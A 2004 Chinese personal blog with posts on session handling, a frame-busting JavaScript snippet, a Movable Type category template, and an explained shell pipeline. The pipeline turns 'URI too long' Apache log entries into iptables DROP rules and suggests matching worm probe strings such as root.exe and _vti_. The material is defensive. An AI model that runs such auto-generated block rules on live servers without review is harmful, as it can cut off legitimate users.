使用者已登入 -> 每頁核對 cookie 的 session 與 datebase 的值 .
且檢查時間是否已經超過 .
若已經過期 ,則刪除該筆資料.

使用者登出 -> 刪除資料庫中的 session 值 . 同時刪除使用者 cookie .

使用者關閉瀏覽器 -> 由於產生的 uniquid 直不會重複,所以重開瀏覽器
後需要重新登入.

Posted by jon at 09:57 AM | Comments (0) | TrackBack

April 08, 2004

如何避免自己的網頁被框住

避免別人將自己的網頁加在他的 <frame> </frame> 中..
(被別人盜用自己的網頁. 放置於他的 frame 中)

將下面這小段語法複製到 之間即可
<!--------------- 開始 ------------------------->
<SCRIPT LANGUAGE="JavaScript">
<!--
if(self != top) top.location.href = window.location.href;
//-->
</SCRIPT>
<!--------------- 結束 ------------------------->

取自 http://zutto.myftp.org/~lmi/teach/no_frame.html

Posted by jon at 11:35 AM | Comments (0) | TrackBack

擋掉溢位入侵駭客(病毒)

本文最新網址位於 擋掉溢位入侵駭客(病毒)

擋掉溢位入侵駭客(病毒)的 Script. 如下
grep "URI too long" /var/log/apache/error.log|
\ awk '{FS="client ";print $2}'|awk '{FS="] request";print $1}'|
\ sort|uniq|grep [0-9\.]|
\ awk '{print "/usr/sbin/iptables -A INPUT -s "$1" -j DROP"}'

取自
http://free.tnc.edu.tw/modules/newbb/viewtopic.php?topic_id=492&forum=16
不過. 知道自己的 Apache 有溢位的漏洞... 應該要去修補 Apache 才對呀.. XD
這個 Script 應該沒有使用的必要~~ :) ( 實在想不出來這行加著要做什麼 @,@; )
Mmm... 還是放在技術文件好了.. :)

解說:
取自 http://free.tnc.edu.tw/modules/newbb/viewtopic.php?topic_id=492&forum=16
因為這個 script 有點長, 分別解釋一下用途,
指令之間是以管道(pipeline, | )隔開, 讓前一個指令輸出的結果當成下一個指令的輸入.

1. grep "URI too long" /var/log/apache/error.log
從 apache 的錯誤紀錄中, 找到偶 "URI too long" 這個字串的紀錄, 而會有這個連線的電腦, 可能是中毒的電腦.

2. awk '{FS="client ";print $2}'|awk '{FS="] request";print $1}'
這是兩個指令, 不過功能是一組的, 也就是將紀錄中, 屬於 IP 的部份抓出來, 所以用 awk 來去頭去尾.

3. sort|uniq
這也是兩個指令, 功能是將重覆的 IP 消除, 所以先以 sort 將剛剛抓到的資料排序, 再以 uniq 指令, 將同樣的資料只取一次

4. grep [0-9\.]
這個比較特別, 由於抓出來的資料有幾筆會有問題, 所以用 grep 過濾, 只抓看起來像 IP 的資料.
(註: 後來改成了 grep [0-9]|grep "\." , 因為 grep [0-9\.] 還是會有些看起來是日期的資料留下來, 所以分成兩個步驟, 可以比較確實的過濾掉.

5. awk '{print "/usr/sbin/iptables -A INPUT -s "$1" -j DROP"}'
將剛剛抓下來的資料, 改寫成 iptables 的用法, 也就是:
-A INPUT : 對本主機的連線
-s 剛剛抓的資料 : 如果是從可能中毒的電腦來的
-j DROP : 就丟掉....

如果上面的 script 沒有問題, 應該可以看到類似以下的結果:
/usr/sbin/iptables -A INPUT -s 192.168.0.3 -j DROP
/usr/sbin/iptables -A INPUT -s 192.168.0.21 -j DROP
/usr/sbin/iptables -A INPUT -s 192.168.1.32 -j DROP
/usr/sbin/iptables -A INPUT -s 192.168.1.40 -j DROP
/usr/sbin/iptables -A INPUT -s 192.168.1.77 -j DROP

之後就可以選擇幾種作法:
1. 直接用 xargs 執行
2. 將結果寫入 /etc/rc.d/rc.firewall.uritoolong (舉例)
3. 使用 crontab 定期執行這個 script

舉一反三:
1. 以同樣的原理, 也可以將 root.exe , /script/*.dll , MSOffice/ , _vti_ 等字串列入, 因為這幾個也是中毒後的電腦會嘗試攻擊的連線, 如果不屬於自己管理的網域, 就擋掉.

2. 以同樣的原理, 如果屬於自己管理的網域, 就可以查到中毒的電腦, 先將電腦離線以免再傳染.


寫好的檔案
http://kcu.adsldns.org/computer/linux/banip

Posted by jon at 11:25 AM | Comments (0) | TrackBack

March 29, 2004

MT新增分類項目

MT 有分類項目,不過於首頁總是沒有出現,要手動新增,做法如下

管理介面 -> 模版 -> index.html

<div class="sidetitle">
分類項目
</div>

<div class="side">
<lu>
<MTArchiveList archive_type="Category">
<li>
<a href="<$MTArchiveLink$>"><$MTCategoryLabel$></a> (<$MTCategoryCount$>) <br/>
<MTEntries lastn="5">

<a href="<$MTEntryPermalink$>"><font color=green></font><$MTEntryTitle$></a><br/> </MTEntries>
<br/>
</li>
</MTArchiveList>
</lu>
</div>

再點存檔 -> 重建 即可。

Posted by jon at 08:25 PM | Comments (0) | TrackBack